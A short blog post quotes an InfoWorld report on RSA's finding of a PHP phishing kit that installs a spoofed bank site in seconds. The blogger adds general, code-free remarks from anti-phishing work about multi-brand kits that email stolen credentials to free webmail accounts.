Via Infoworld.com -
Software developers like to make installation of their programs simple and quick. So do hackers.
Analysts at RSA Security early last month spotted a single piece of PHP code that installs a phishing site on a compromised server in about two seconds, the vendor noted in its monthly online fraud report for June, released on Tuesday.
The code contains all of the HTML (Hypertext Markup Language) and graphics needed for the fraudulent Web site, which spoofed a financial institution that RSA did not name in the report. The ".exe" file automatically installs the code and graphics in the right directories, RSA said.
---------------------------------
This isn't new information to me, but I think most people don't understand how slick phishers are becoming. In my time with PIRT, I saw numerous phishing kits. Many were PHP based and would contain 2 to 5 different phishing sites in them. The install would expand and drop all the phishing files in separate directories used to target different companies.
A single kit could deploy a HSBC, Paypal, and a Bank of America phishing site all at the same time. All with the click of an unzip button.
All of these separate phishing sites (stored in their own directory structures) would use the same backend collection scripts (again, mostly PHP based), which would format the user/pass data and then mail it off to free e-mail accounts (commonly Gmail or Yahoo accounts).
I haven't been active in the anti-phishing community for quite sometime, so I can only guess how advanced they are getting now.
No comments:
Post a Comment